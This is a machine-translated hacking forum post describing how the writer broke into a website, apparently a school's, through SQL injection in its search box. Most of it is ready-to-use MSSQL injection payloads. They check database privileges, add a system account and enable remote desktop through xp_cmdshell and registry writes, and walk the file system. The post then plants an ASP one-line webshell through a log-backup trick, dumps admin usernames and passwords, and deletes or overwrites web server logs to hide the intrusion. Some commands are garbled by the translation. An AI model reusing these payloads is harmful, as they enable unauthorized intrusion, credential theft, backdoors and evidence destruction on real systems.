Summarize the whole process of manual injection for search (methods under different permissions)

I am a small dish and have a limited level. But to contribute to the Forum, I 'd like to write some original things by myself. Hope you can stop smiling ....
========================================================== ====================
Some time ago, my friend lost a website and said it was from their school. Ask me for help.
So I read it. I scanned it with a scanner and found that there was nothing I could upload and use. In the background, the default password and the universal password were invalid,
No injection points, manual and tool tests, anti-injection, and COOKIES injection. The source code of the program cannot be found and cannot be analyzed. Side note?
The whole site is an independent server, so there is no way to stand alone. Is it difficult to enter section C? So troublesome. Let's look at some big guys in the group,
I can't make it all. (I should have taken it seriously .), I got a big blow, but I don't give up. Let's take a look.
So I found a search box and intuitively told me that this is a breakthrough point .....

Something went wrong some time ago.
The whole process made simple notes and collected some manual injection code. Let's take a look.

First, you can simply search for a search injection vulnerability if it does not exist. If an error occurs, the vulnerability exists in 90%.

 

A % & apos; and 1 = 1 -- normal

A % & apos; and 1 = 2 -- Error

 

Injected

Because the website filters out & apos; and so on. So the tool won't work. You need to do it manually. Tiring people ~~~

Determine Permissions

A % & apos; and (select is_member (& apos; dbo & apos;) = 1 -- sa

A % & apos; and (select is_member (& apos; db_owner & apos;) = 1 -- if the returned result is normal, the database

 

No, there is only one possibility. The public permission seems very small.

You can also use another command to determine permissions.

A % & apos; and 1 = (Select IS_SRVROLEMEMBER (& apos; sysadmin & apos;); -- sa

A % & apos; and 1 = (Select IS_MEMBER (& apos; db_owner & apos;); -- DB

 

========================================================== ========================================================== ======
Sa method. Directly create a system account password. Login 3389.

Command is

A % & apos; exec master .. xp_mongoshell "net user admins 123456/add "--

 

If & apos; xp_mongoshell & apos; is disabled. To enable it.

EXEC sp_configure & apos; show advanced options & apos;, 1; RECONFIGURE; EXEC sp_configure & apos; xp_cmdshell & apos;, 1; RECONFIGURE; reconfigure

At last, 1 is enabled. 0 is disabled.

A % & apos; EXEC sp_configure & apos; show advanced options & apos;, 1; RECONFIGURE; EXECsp_configure & apos; xp_cmdshell & apos;, 1; RECONFIGURE --

 

If you do not open 3389

The following command ..

 

A % & apos; exec master. dbo. xp_regwrite & apos; HKEY_LOCAL_MACHINE & apos;, & apos; SYSTEMCurrentControlSetControlTerminal Server & apos;, & apos; fDenyTSConnections & apos;, & apos; REG_DWORD & apos;, 0 ;--

 

========================================================== ========================================================== ======
Db Method

The main idea is to list directories-differential backup also requires the database name. Find a solution.

First column directory

A % & apos; order by XX -- Example 12

Then

A % & apos; and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12 --

Find the character type, such as 5

"MSSQL manual injection Directory Search auxiliary tool" Baidu go to Kazakhstan...

Code for generating the column directory using MSSQL manual injection Directory Search auxiliary tool in Tianyang. For example, the C disk is generated.

Then

 

A % & apos; drop table t_tian6 create table t_tian6 (fn nvarchar (4000), d int, f int) declare @ root nvarchar (4000) set @ root = 0x43003A00 insert into t_tian6 exec master .. xp_dirtree @ root, 4000 update t_tian6 set fn = fn + char (92) where f = 0 drop table t_tian6_1 create tabLe t_tian6_1 (f nvarchar () -- // create Insert table data

 

Then

 

A % & apos; declare @ fn nvarchar (400), @ f int, @ r nvarchar (4000) set @ r = char (9) declare cr cursor for select fn, f from t_tian6 order by f, fn open cr fetch cr into @ fn, @ f while @ fetch_status = 0 begin set @ r = @ r + @ fn + char (9) fetch cr into @ fn, @ f end close cr deallocate cr insert intO t_tian6_1 (f) values (@ r) -- // remote sorting

 

Then

 

A % & apos; and 1 = 2 union select 1, 2, 3, 4, (select top 1 f from t_tian6_1), 6, 7, 8, 9, 10, 11, 12 --

Obtain the result. The path is displayed.

Next, we will continue to use MSSQL to manually inject the Directory Search auxiliary tool to generate code for the column directory. Follow the steps above to obtain the path... Until the root directory of the website is found.

Then retrieve the Database Name

Command:

 

A % & apos; and 1 = 2 union select 1, 2, 3, 4, (select db_name (), 6, 7, 8, 9, 10, 11, 12 --

 

And (select db_name ()> 0 is the name of the database to be queried. It is directly displayed here. // And user> 0 to view the current user. This seems useless and should not be needed, but it is usually used for injection.

The next step is to back up a Trojan horse by mistake.

Here we use the LOG five-step backup method. Finally, if you get the permission, you 'd better delete the backup.

The code is

 

A % & apos; alter database name set recovery full --

A % & apos; create table cmd (a image )--

A % & apos; backup log database name to disk = & apos; c: ackuplog. bak & apos; with init -- a % & apos; insert into cmd (a) values (0x3c256576616c20450571756573742822612229253e )--

A % & apos; backup log database name to disk = & apos; D:/*****/a. asp & apos; -- // fill in the obtained path

 

 

0x3c256576616c20450571756573742822612229253e = one-sentence Trojan = <% eval (request ("a") %>

The database name is just found. Enter it by yourself.

Then we can use a single sentence to connect. OK. Succeeded.

========================================================== ========================================================== ======
How can I obtain the public permission?

Then we had to check the Administrator's account and password and log on to the background to get webshell.

A % & apos; order by XX example 12

Then

A % & apos; and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12 --

Guess table

A % & apos; and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 from admin -- // you can guess if admin returns normal. If not, try other ones, such as manage user.

A % & apos; and 1 = 2 union select 1, 2, 3, 4, username, password, 7, 8, 9, 10, 11, 12 from admin --

Guess account password

Two fields, one username and one password. If the returned result is normal, the Administrator account and password are displayed.
If not, try other fields.

Then, log on to the background and use webshell.

========================================================== ========================================================== ======
Clear logs:

Delete:
A % & apos; exec master .. xp_cmdshell "del C: winntsystem32logfilesW3SVC1ex090127. log "--

Coverage: (recommended)
A % & apos; exec master .. xp_cmdshell "copy C: winntsystem32logfilesW3SVC1ex090201. log C: winntsystem32logfilesW3SVC1ex100201. log "--

Change the path based on the system.
========================================================== ========================================================== ======
Note:
If the number of words in the search box is limited. Click to view the source file and find
<Input type = "text" name = "keyword" size = 10 value = "No keyword" maxlength = "50">

Put
The value of maxlength is larger.
For example
<Input type = "text" name = "keyword" size = 10 value = "No keyword" maxlength = "1000000">
Save and submit it locally.

It will not be limited. Haha. I don't believe you can enter more than this number.
It seems redundant.